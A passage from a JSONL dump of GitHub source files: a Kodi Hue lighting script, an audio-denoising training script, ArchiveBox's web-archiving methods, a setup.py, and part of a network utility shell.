os.path.join(SYSTEM_FOLDER_PATH, 'BrowserCache')\n }\n }\n\n\ndef save_system_config(data):\n config_dir = os.path.dirname(SYSTEM_CONFIG_PATH)\n os.makedirs(config_dir, exist_ok=True)\n\n with open(SYSTEM_CONFIG_PATH, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef load_system_config():\n if os.path.isfile(SYSTEM_CONFIG_PATH):\n with open(SYSTEM_CONFIG_PATH, \"r\") as f:\n my_data = json.load(f)\n default_data = get_system_config_template()\n dict_merge(my_data, default_data)\n return my_data\n else:\n return get_system_config_template()\n\n\ndef delete_system_config():\n # 檔案路徑\n file = Path(SYSTEM_CONFIG_PATH)\n try:\n file.unlink()\n except OSError as e:\n print(\"Get Error: %s : %s\" % (file, e.strerror))\n","repo_name":"ontisme/Socializing","sub_path":"backend/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41404604134","text":"#\n# Kodi Script plugin that handles the actions for the huecontorl\n#\n\nimport json\nimport httplib\nimport xbmc, xbmcgui, xbmcaddon\nimport subprocess,os\nimport sys\nfrom urlparse import urlparse, parse_qs\n\nimport hue\nimport huecontrol\nimport xbmccommon\nimport time\n\n\ndef recallScene(sceneName):\n briOnly = __addon__.getSetting(\"brightnessonly\" + sceneName) == \"true\"\n state = hueAddonSettings.data[\"scene\" + sceneName]\n logDebug(\"recall preset\" + sceneName + \": \" + str(state))\n\n bridge = hue.Bridge(ip=hueAddonSettings.data[\"bridgeip\"], id=hueAddonSettings.data[\"bridgeid\"],username=hueAddonSettings.data.get(\"bridgeusername\", None))\n bridge.setFullStateLights(state, xbmccommon.getConfiguredLampsList(), briOnly)\n\n\naddonId = sys.argv[0] # e.g. service.huecontrol\n\n__addon__ = xbmcaddon.Addon(id=xbmccommon.ADDON_ID)\n__addonpath__ = xbmc.translatePath(__addon__.getAddonInfo('path')).decode(\"utf-8\") # Translate path to change special:// protocol to a normal path\n__addonicon__ = os.path.join(__addonpath__, 'icon.png')\n__language__ = __addon__.getLocalizedString\n\n\nhueAddonSettings = xbmccommon.HueControlSettings()\nlogError = xbmccommon.logError\nlogDebug = xbmccommon.logDebug\n\nidx = 1\nparameters = {}\nparameters[\"action\"] = \"none\"\n\nwhile idx < len(sys.argv):\n args = sys.argv[idx].split('=')\n parameters[args[0]] = args[1]\n idx += 1\n\nif (parameters['action'] == \"none\"):\n # No action parameter, so must be run from programs thingy.\n # Lets show presets\n parameters['action'] = \"showpresets\"\n\n\n \nif (parameters['action'] == \"connect_to_bridge\"):\n \n progress = xbmcgui.DialogProgress()\n progress.create(__language__(30007), __language__(30008))\n progress.update(0)\n \n bridges = hue.BridgeLocator(iprange=xbmc.getIPAddress(), logfunc=logDebug).FindBridges(progress=progress.update)\n bridgeidx = -1;\n \n progress.close();\n \n if (len(bridges) == 0):\n xbmcgui.Dialog().ok(__language__(30009), __language__(30010)) \n elif (len(bridges) == 1):\n # Only one bridge, done\n bridgeidx = 0\n bridge = bridges[bridgeidx]\n xbmccommon.notify(__language__(30011).format(bridge.name)) # Keep output on one line. Name is name + IP e.g. Philips hue (111.112.113.114)\n else:\n dialog = xbmcgui.Dialog()\n \n bridgenames = [\"{0} - {1} ({2})\".format(bridge.name, bridge.id[-6:].upper(), bridge.ip) for bridge in bridges]\n bridgeidx = dialog.select(__language__(30020).format(len(bridgenames)), bridgenames)\n \n if (bridgeidx >= 0):\n\n bridge = bridges[bridgeidx]\n bridge.logfunc = logDebug\n if (\"bridgeusername\" in hueAddonSettings.data):\n bridge.username = hueAddonSettings.data[\"bridgeusername\"]\n bridge.devicetype = huecontrol.DEVICETYPE.format(xbmc.getInfoLabel('System.FriendlyName') )\n \n xbmc.log(msg='Selected bridge {0} = {1}'.format(bridgeidx, bridge))\n \n hueAddonSettings.data[\"bridgeip\"] = bridge.ip\n hueAddonSettings.data[\"bridgeid\"] = bridge.id\n \n if (not bridge.isAuthorized()):\n # Perform authorization part\n # Use progress dialog to have a button with a cancel button\n progress = xbmcgui.DialogProgress()\n progress.create(__language__(30013), __language__(30014))\n progress.update(0)\n \n maxcount = 60\n count = 0\n while count < maxcount:\n progress.update(int((100.0/maxcount) * count), __language__(30014), __language__(30015).format(maxcount - count))\n result = bridge.authorize()\n \n if result == 0 or progress.iscanceled():\n # done, break loop\n count = maxcount\n \n count = count + 1\n time.sleep(1)\n \n progress.close();\n \n if (not bridge.isAuthorized()):\n xbmccommon.notify(__language__(30016), duration=5000)\n else:\n hueAddonSettings.data[\"bridgeusername\"] = bridge.username\n # For safety remove any old (fixed) usernames\n bridge.DELETE(\"/config/whitelist/{0}\".format(huecontrol.OLD_BRIDGEUSER))\n \n xbmccommon.notify(__language__(30017), duration=5000)\n \n hueAddonSettings.store()\n \nelif (parameters['action'] == \"savescene\"):\n \n bridge = hue.Bridge(ip=hueAddonSettings.data[\"bridgeip\"], id=hueAddonSettings.data[\"bridgeid\"], username=hueAddonSettings.data.get(\"bridgeusername\", None))\n \n state = bridge.getFullState()\n\n id = parameters['id']\n logDebug(\"save scene\" + id + \": \" + str(state))\n __addon__.setSetting(\"scene\" + id, \"\") # I used to store the complete state here, write an empty string now, to \"unbloat\" the settings.xml\n hueAddonSettings.data[\"scene\" + id] = state\n \n if hueAddonSettings.store():\n presetname = __addon__.getSetting(\"namescene\" + id)\n if presetname == \"\":\n presetname = id\n xbmccommon.notify(__language__(30034).format(presetname))\n\nelif (parameters['action'] == \"recallscene\"):\n\n recallScene(paramters['id'])\n\nelif (parameters['action'] == \"showpresets\"):\n\n dialog = xbmcgui.Dialog()\n \n presetnames = []\n \n presetnames.append(__language__(30030)) # Playing\n presetnames.append(__language__(30040)) # Paused\n \n for i in range(huecontrol.NUM_PRESETS):\n logDebug(\"namescene\" + str(i+1) + \" - \" + __addon__.getSetting(\"namescenePreset\" + str(i+1)))\n presetnames.append (__addon__.getSetting(\"namescenePreset\" + str(i+1)))\n \n idx = dialog.select(__language__(30202), presetnames)\n \n if idx >= 0:\n # Assume one of the presets\n presetId = \"Preset\" + str(idx+1-2)\n \n if idx == 0:\n presetId = \"Playing\"\n if idx == 1:\n presetId = \"Paused\"\n\n recallScene(presetId)\n \n","repo_name":"mvdwetering/service.huecontrol","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"17408959472","text":"import torch\nfrom torch.utils.data.dataset import random_split\nfrom torchaudio import datasets\n\nfrom dcunet.dcunet import DCUnet10\nfrom dcunet.train import train, wsdr_fn\nfrom utils.data import get_data, preprocess, WrappedDataLoader\n\ndev = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndataset = datasets.VCTK_092(root=\"data\", download=False)\n\nds_size = len(dataset)\ntrain_i = int(0.1 * ds_size)\ntrain_i += train_i % 2\nval_i = int(0.11 * ds_size) - train_i\nval_i += val_i % 2\ntest_i = int(0.12 * ds_size) - train_i - val_i\ntest_i += test_i % 2\nother = ds_size - train_i - val_i - test_i\n\ntrain_ds, val_ds, test_ds, other = random_split(dataset, lengths=[train_i, val_i, test_i, other],\n generator=torch.Generator().manual_seed(42))\n\nbatch_size = 1\nSAMPLE_RATE = 48000\nN_FFT = SAMPLE_RATE * 64 // 1000 + 4\nHOP_LENGTH = SAMPLE_RATE * 16 // 1000 + 4\nzero_q = 0.9\nzero_f = 0.2\none_q = 0.9\none_f = 0.5\n\ntrain_dl, val_dl, test_dl = get_data(train_ds, val_ds, test_ds, batch_size)\ntrain_dl = WrappedDataLoader(train_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q,\n one_f=one_f)\nval_dl = WrappedDataLoader(val_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q, one_f=one_f)\ntest_dl = WrappedDataLoader(test_dl, preprocess, HOP_LENGTH, dev, zero_q=zero_q, zero_f=zero_f, one_q=one_q,\n one_f=one_f)\n\ndcunet10 = DCUnet10(N_FFT, HOP_LENGTH).to(dev)\n\nloss_fn = wsdr_fn\noptimizer = torch.optim.Adam(dcunet10.parameters(), lr=1e-4)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)\n\ntrain_losses, test_losses = train(dcunet10, train_dl, val_dl, loss_fn, optimizer, scheduler, 100, dev)\n","repo_name":"alexander-prutko/mil-audio-denoising","sub_path":"main_dcunet.py","file_name":"main_dcunet.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36777171901","text":"import os\n\nfrom collections import defaultdict\nfrom datetime import datetime\n\nfrom index import (\n write_link_index,\n patch_links_index,\n load_json_link_index,\n)\nfrom config import (\n CURL_BINARY,\n GIT_BINARY,\n WGET_BINARY,\n YOUTUBEDL_BINARY,\n FETCH_FAVICON,\n FETCH_TITLE,\n FETCH_WGET,\n FETCH_WGET_REQUISITES,\n FETCH_PDF,\n FETCH_SCREENSHOT,\n FETCH_DOM,\n FETCH_WARC,\n FETCH_GIT,\n FETCH_MEDIA,\n SUBMIT_ARCHIVE_DOT_ORG,\n TIMEOUT,\n MEDIA_TIMEOUT,\n ANSI,\n OUTPUT_DIR,\n GIT_DOMAINS,\n GIT_SHA,\n WGET_USER_AGENT,\n CHECK_SSL_VALIDITY,\n COOKIES_FILE,\n WGET_AUTO_COMPRESSION\n)\nfrom util import (\n domain,\n extension,\n without_query,\n without_fragment,\n fetch_page_title,\n is_static_file,\n TimedProgress,\n chmod_file,\n wget_output_path,\n chrome_args,\n check_link_structure,\n run, PIPE, DEVNULL\n)\nfrom logs import (\n log_link_archiving_started,\n log_link_archiving_finished,\n log_archive_method_started,\n log_archive_method_finished,\n)\n\n\n\nclass ArchiveError(Exception):\n def __init__(self, message, hints=None):\n super().__init__(message)\n self.hints = hints\n\n\ndef archive_link(link_dir, link):\n \"\"\"download the DOM, PDF, and a screenshot into a folder named after the link's timestamp\"\"\"\n\n ARCHIVE_METHODS = (\n ('title', should_fetch_title, fetch_title),\n ('favicon', should_fetch_favicon, fetch_favicon),\n ('wget', should_fetch_wget, fetch_wget),\n ('pdf', should_fetch_pdf, fetch_pdf),\n ('screenshot', should_fetch_screenshot, fetch_screenshot),\n ('dom', should_fetch_dom, fetch_dom),\n ('git', should_fetch_git, fetch_git),\n ('media', should_fetch_media, fetch_media),\n ('archive_org', should_fetch_archive_dot_org, archive_dot_org),\n )\n \n try:\n is_new = not os.path.exists(link_dir)\n if is_new:\n os.makedirs(link_dir)\n\n link = load_json_link_index(link_dir, link)\n log_link_archiving_started(link_dir, link, is_new)\n stats = {'skipped': 0, 'succeeded': 0, 'failed': 0}\n\n for method_name, should_run, method_function in ARCHIVE_METHODS:\n if method_name not in link['history']:\n link['history'][method_name] = []\n \n if should_run(link_dir, link):\n log_archive_method_started(method_name)\n\n result = method_function(link_dir, link)\n link['history'][method_name].append(result)\n\n stats[result['status']] += 1\n log_archive_method_finished(result)\n else:\n stats['skipped'] += 1\n\n # print(' ', stats)\n\n write_link_index(link_dir, link)\n patch_links_index(link)\n log_link_archiving_finished(link_dir, link, is_new, stats)\n\n except Exception as err:\n print(' ! Failed to archive link: {}: {}'.format(err.__class__.__name__, err))\n raise\n \n return link\n\n\n### Archive Method Functions\n\ndef should_fetch_title(link_dir, link):\n # if link already has valid title, skip it\n if link['title'] and not link['title'].lower().startswith('http'):\n return False\n\n if is_static_file(link['url']):\n return False\n\n return FETCH_TITLE\n\ndef fetch_title(link_dir, link, timeout=TIMEOUT):\n \"\"\"try to guess the page's title from its content\"\"\"\n\n output = None\n cmd = [\n CURL_BINARY,\n link['url'],\n '|',\n 'grep',\n '',\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n output = fetch_page_title(link['url'], timeout=timeout, progress=False)\n if not output:\n raise ArchiveError('Unable to detect page title')\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef should_fetch_favicon(link_dir, link):\n if os.path.exists(os.path.join(link_dir, 'favicon.ico')):\n return False\n\n return FETCH_FAVICON\n\ndef fetch_favicon(link_dir, link, timeout=TIMEOUT):\n \"\"\"download site favicon from google's favicon api\"\"\"\n\n output = 'favicon.ico'\n cmd = [\n CURL_BINARY,\n '--max-time', str(timeout),\n '--location',\n '--output', output,\n *(() if CHECK_SSL_VALIDITY else ('--insecure',)),\n 'https://www.google.com/s2/favicons?domain={}'.format(domain(link['url'])),\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_wget(link_dir, link):\n output_path = wget_output_path(link)\n if output_path and os.path.exists(os.path.join(link_dir, output_path)):\n return False\n\n return FETCH_WGET\n\n\ndef fetch_wget(link_dir, link, timeout=TIMEOUT):\n \"\"\"download full site using wget\"\"\"\n\n if FETCH_WARC:\n warc_dir = os.path.join(link_dir, 'warc')\n os.makedirs(warc_dir, exist_ok=True)\n warc_path = os.path.join('warc', str(int(datetime.now().timestamp())))\n\n # WGET CLI Docs: https://www.gnu.org/software/wget/manual/wget.html\n output = None\n cmd = [\n WGET_BINARY,\n # '--server-response', # print headers for better error parsing\n '--no-verbose',\n '--adjust-extension',\n '--convert-links',\n '--force-directories',\n '--backup-converted',\n '--span-hosts',\n '--no-parent',\n '-e', 'robots=off',\n '--restrict-file-names=windows',\n '--timeout={}'.format(timeout),\n *(('--compression=auto',) if WGET_AUTO_COMPRESSION else ()),\n *(() if FETCH_WARC else ('--timestamping',)),\n *(('--warc-file={}'.format(warc_path),) if FETCH_WARC else ()),\n *(('--page-requisites',) if FETCH_WGET_REQUISITES else ()),\n *(('--user-agent={}'.format(WGET_USER_AGENT),) if WGET_USER_AGENT else ()),\n *(('--load-cookies', COOKIES_FILE) if COOKIES_FILE else ()),\n *((() if CHECK_SSL_VALIDITY else ('--no-check-certificate', '--no-hsts'))),\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n output = wget_output_path(link)\n\n # parse out number of files downloaded from last line of stderr:\n # \"Downloaded: 76 files, 4.0M in 1.6s (2.52 MB/s)\"\n output_tail = [\n line.strip()\n for line in (result.stdout + result.stderr).decode().rsplit('\\n', 3)[-3:]\n if line.strip()\n ]\n files_downloaded = (\n int(output_tail[-1].strip().split(' ', 2)[1] or 0)\n if 'Downloaded:' in output_tail[-1]\n else 0\n )\n\n # Check for common failure cases\n if result.returncode > 0 and files_downloaded < 1:\n hints = (\n 'Got wget response code: {}.'.format(result.returncode),\n *output_tail,\n )\n if b'403: Forbidden' in result.stderr:\n raise ArchiveError('403 Forbidden (try changing WGET_USER_AGENT)', hints)\n if b'404: Not Found' in result.stderr:\n raise ArchiveError('404 Not Found', hints)\n if b'ERROR 500: Internal Server Error' in result.stderr:\n raise ArchiveError('500 Internal Server Error', hints)\n raise ArchiveError('Got an error from the server', hints)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_pdf(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'output.pdf')):\n return False\n\n return FETCH_PDF\n\n\ndef fetch_pdf(link_dir, link, timeout=TIMEOUT):\n \"\"\"print PDF of site to file using chrome --headless\"\"\"\n\n output = 'output.pdf'\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--print-to-pdf',\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if result.returncode:\n hints = (result.stderr or result.stdout).decode()\n raise ArchiveError('Failed to print PDF', hints)\n \n chmod_file('output.pdf', cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_screenshot(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'screenshot.png')):\n return False\n\n return FETCH_SCREENSHOT\n\ndef fetch_screenshot(link_dir, link, timeout=TIMEOUT):\n \"\"\"take screenshot of site using chrome --headless\"\"\"\n\n output = 'screenshot.png'\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--screenshot',\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if result.returncode:\n hints = (result.stderr or result.stdout).decode()\n raise ArchiveError('Failed to take screenshot', hints)\n\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_dom(link_dir, link):\n if is_static_file(link['url']):\n return False\n \n if os.path.exists(os.path.join(link_dir, 'output.html')):\n return False\n\n return FETCH_DOM\n \ndef fetch_dom(link_dir, link, timeout=TIMEOUT):\n \"\"\"print HTML of site to file using chrome --dump-html\"\"\"\n\n output = 'output.html'\n output_path = os.path.join(link_dir, output)\n cmd = [\n *chrome_args(TIMEOUT=timeout),\n '--dump-dom',\n link['url']\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n with open(output_path, 'w+') as f:\n result = run(cmd, stdout=f, stderr=PIPE, cwd=link_dir, timeout=timeout)\n\n if result.returncode:\n hints = result.stderr.decode()\n raise ArchiveError('Failed to fetch DOM', hints)\n\n chmod_file(output, cwd=link_dir)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef should_fetch_git(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'git')):\n return False\n\n is_clonable_url = (\n (domain(link['url']) in GIT_DOMAINS)\n or (extension(link['url']) == 'git')\n )\n if not is_clonable_url:\n return False\n\n return FETCH_GIT\n\n\ndef fetch_git(link_dir, link, timeout=TIMEOUT):\n \"\"\"download full site using git\"\"\"\n\n output = 'git'\n output_path = os.path.join(link_dir, 'git')\n os.makedirs(output_path, exist_ok=True)\n cmd = [\n GIT_BINARY,\n 'clone',\n '--mirror',\n '--recursive',\n *(() if CHECK_SSL_VALIDITY else ('-c', 'http.sslVerify=false')),\n without_query(without_fragment(link['url'])),\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=output_path, timeout=timeout + 1)\n\n if result.returncode == 128:\n # ignore failed re-download when the folder already exists\n pass\n elif result.returncode > 0:\n hints = 'Got git response code: {}.'.format(result.returncode)\n raise ArchiveError('Failed git download', hints)\n\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef should_fetch_media(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'media')):\n return False\n\n return FETCH_MEDIA\n\ndef fetch_media(link_dir, link, timeout=MEDIA_TIMEOUT):\n \"\"\"Download playlists or individual video, audio, and subtitles using youtube-dl\"\"\"\n\n output = 'media'\n output_path = os.path.join(link_dir, 'media')\n os.makedirs(output_path, exist_ok=True)\n cmd = [\n YOUTUBEDL_BINARY,\n '--write-description',\n '--write-info-json',\n '--write-annotations',\n '--yes-playlist',\n '--write-thumbnail',\n '--no-call-home',\n '--no-check-certificate',\n '--user-agent',\n '--all-subs',\n '--extract-audio',\n '--keep-video',\n '--ignore-errors',\n '--geo-bypass',\n '--audio-format', 'mp3',\n '--audio-quality', '320K',\n '--embed-thumbnail',\n '--add-metadata',\n *(() if CHECK_SSL_VALIDITY else ('--no-check-certificate',)),\n link['url'],\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=PIPE, cwd=output_path, timeout=timeout + 1)\n chmod_file(output, cwd=link_dir)\n if result.returncode:\n if (b'ERROR: Unsupported URL' in result.stderr\n or b'HTTP Error 404' in result.stderr\n or b'HTTP Error 403' in result.stderr\n or b'URL could be a direct video link' in result.stderr\n or b'Unable to extract container ID' in result.stderr):\n # These happen too frequently on non-media pages to warrant printing to console\n pass\n else:\n hints = (\n 'Got youtube-dl response code: {}.'.format(result.returncode),\n *result.stderr.decode().split('\\n'),\n )\n raise ArchiveError('Failed to download media', hints)\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\n\ndef should_fetch_archive_dot_org(link_dir, link):\n if is_static_file(link['url']):\n return False\n\n if os.path.exists(os.path.join(link_dir, 'archive.org.txt')):\n # if open(path, 'r').read().strip() != 'None':\n return False\n\n return SUBMIT_ARCHIVE_DOT_ORG\n\ndef archive_dot_org(link_dir, link, timeout=TIMEOUT):\n \"\"\"submit site to archive.org for archiving via their service, save returned archive url\"\"\"\n\n output = 'archive.org.txt'\n archive_org_url = None\n submit_url = 'https://web.archive.org/save/{}'.format(link['url'])\n cmd = [\n CURL_BINARY,\n '--location',\n '--head',\n '--user-agent', 'ArchiveBox/{} (+https://github.com/pirate/ArchiveBox/)'.format(GIT_SHA), # be nice to the Archive.org people and show them where all this ArchiveBox traffic is coming from\n '--max-time', str(timeout),\n *(() if CHECK_SSL_VALIDITY else ('--insecure',)),\n submit_url,\n ]\n status = 'succeeded'\n timer = TimedProgress(timeout, prefix=' ')\n try:\n result = run(cmd, stdout=PIPE, stderr=DEVNULL, cwd=link_dir, timeout=timeout)\n content_location, errors = parse_archive_dot_org_response(result.stdout)\n if content_location:\n archive_org_url = 'https://web.archive.org{}'.format(content_location[0])\n elif len(errors) == 1 and 'RobotAccessControlException' in errors[0]:\n archive_org_url = None\n # raise ArchiveError('Archive.org denied by {}/robots.txt'.format(domain(link['url'])))\n elif errors:\n raise ArchiveError(', '.join(errors))\n else:\n raise ArchiveError('Failed to find \"content-location\" URL header in Archive.org response.')\n except Exception as err:\n status = 'failed'\n output = err\n finally:\n timer.end()\n\n if not isinstance(output, Exception):\n # instead of writing None when archive.org rejects the url write the\n # url to resubmit it to archive.org. This is so when the user visits\n # the URL in person, it will attempt to re-archive it, and it'll show the\n # nicer error message explaining why the url was rejected if it fails.\n archive_org_url = archive_org_url or submit_url\n with open(os.path.join(link_dir, output), 'w', encoding='utf-8') as f:\n f.write(archive_org_url)\n chmod_file('archive.org.txt', cwd=link_dir)\n output = archive_org_url\n\n return {\n 'cmd': cmd,\n 'pwd': link_dir,\n 'output': output,\n 'status': status,\n **timer.stats,\n }\n\ndef parse_archive_dot_org_response(response):\n # Parse archive.org response headers\n headers = defaultdict(list)\n\n # lowercase all the header names and store in dict\n for header in response.splitlines():\n if b':' not in header or not header.strip():\n continue\n name, val = header.decode().split(':', 1)\n headers[name.lower().strip()].append(val.strip())\n\n # Get successful archive url in \"content-location\" header or any errors\n content_location = headers['content-location']\n errors = headers['x-archive-wayback-runtime-error']\n return content_location, errors\n","repo_name":"nugsazz/ArchiveBox","sub_path":"archivebox/archive_methods.py","file_name":"archive_methods.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23510218505","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"bioviz\",\n version=\"0.1.dev1\",\n author=\"Rebeka Tresnyics, Dr. Nandor Poka\",\n author_email=\"trebeka98@gmail.com, np@np-bio.info\",\n description=\"Visualize biological data using Bokeh\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/BioWiz/msa\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Visualization\"\n ],\n python_requires='>=3.7',\n install_requires=['biopython==1.78', 'bokeh==2.2.1', 'selenium==3.141.0','diffimg==0.3.0' ]\n)\n","repo_name":"BioWiz/msa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15703442902","text":"#!/usr/bin/env python\nimport cmd2\nfrom cmd2 import categorize\nimport subprocess\nimport re\nimport requests\nimport platform\nimport csv\nimport calendar\nimport webbrowser\n#import pathlib\nfrom pythonping import ping\nfrom datetime import datetime\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich import print\nfrom tcp_latency import measure_latency\nimport ipaddress\nfrom ipaddress import ip_network\nfrom time import sleep\nfrom progress.spinner import MoonSpinner\n\nfrom swiss_conf import *\nimport swiss_func\n\nOPERATING_SYSTEM = platform.system()\nRICH_CONSOLE = Console()\nCURRENT_TIME = datetime.now()\nCLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\nIP_REGEX = \"\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}\"\nFIREFOX_PATH=\"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\"\nwebbrowser.register('firefox', None,webbrowser.BackgroundBrowser(FIREFOX_PATH))\n\n# Pre cmd-loop\n# Banner ascii\nswiss_func.show_motd()\n# IP list using psutils\nif IP_BANNER == True:\n swiss_func.list_interfaces()\nelse:\n pass\n# Subprocess the shell command like route print or ip route\nswiss_func.list_routes()\n\n# Cmd loop app\nclass SwissKnife(cmd2.Cmd):\n prompt = \"# \"\n intro = ''\n\n # Pulling mac vendor from https://api.macvendors.com/FC:FB:FB:01:FA:21\n def do_macvendor(selg, args):\n try:\n print(requests.get(\"https://api.macvendors.com/\" + args).text)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Print current time and a small calendar\n def do_time(self, _):\n CURRENT_TIME = datetime.now()\n year = CURRENT_TIME.strftime(\"%Y\")\n month = CURRENT_TIME.strftime(\"%m\")\n print(CLOCK_TIME)\n print(calendar.month(int(year), int(month)))\n\n # nslookup of a host\n nslookup_parser = cmd2.Cmd2ArgumentParser()\n nslookup_parser.add_argument(dest='value', type=str, help='DNS lookup of a hostname')\n @cmd2.with_argparser(nslookup_parser)\n def do_nslookup(self, args):\n nslookup_cmd = subprocess.run([\"nslookup\", args.value], stdout=subprocess.PIPE)\n print(nslookup_cmd.stdout.decode('utf-8', 'ignore'))\n\n # subnet printer from decimal value\n subnet_parser = cmd2.Cmd2ArgumentParser()\n subnet_parser.add_argument(dest='value', type=int, help='From integer to subnet')\n @cmd2.with_argparser(subnet_parser)\n def do_subnet(self, args):\n mask = int(args.value)\n if mask > 32 or mask < 0:\n pass\n else:\n bin_train = \"00000000000000000000000000000000\"\n bin_train = bin_train.replace(\"0\",\"1\",mask)\n first_oct = int(bin_train[0:8],2)\n second_oct = int(bin_train[8:16],2)\n third_oct = int(bin_train[16:24],2)\n fourth_oct = int(bin_train[24:32],2)\n print (\"%s.%s.%s.%s\" % (first_oct, second_oct, third_oct, fourth_oct))\n\n # ipaddress — IPv4/IPv6 manipulation library\n ipcheck_parser = cmd2.Cmd2ArgumentParser()\n ipcheck_parser.add_argument(dest='ipcheck', type=str, nargs='?', help='Apply is_multicast, is_private ecc')\n @cmd2.with_argparser(ipcheck_parser)\n def do_ipcheck(ipcheck, args):\n only_ip = re.findall(IP_REGEX, args.ipcheck)\n print(only_ip[0])\n print(\"is_private: %s\\nis_multicast: %s\\nis_reserved: %s\" %\n (ipaddress.ip_address(only_ip[0]).is_private,\n ipaddress.ip_address(only_ip[0]).is_multicast,\n ipaddress.ip_address(only_ip[0]).is_reserved\n )\n )\n print(list(ip_network(args.ipcheck).hosts()))\n\n # Putty automation: the command putty will open by default a ssh connection with admin and port 22, telnet is optional\n putty_parser = cmd2.Cmd2ArgumentParser()\n putty_parser.add_argument(dest='host', type=str)\n putty_parser.add_argument('-p', '--port', type=str, default=\"22\", nargs='?', help='Destination port')\n putty_parser.add_argument('-l', '--username', type=str, default=\"admin\", nargs='?', help='Username')\n putty_parser.add_argument('-pw', '--password', type=str, nargs='?', help='SSH password')\n putty_parser.add_argument('-t', '--telnet', default=False, action='store_true', help='telnet session')\n @cmd2.with_argparser(putty_parser)\n def do_putty(self, args):\n if args.telnet == True:\n subprocess.Popen([PATH_TO_PUTTY, \"-telnet\", args.host], stdout=subprocess.PIPE)\n elif args.password == None:\n 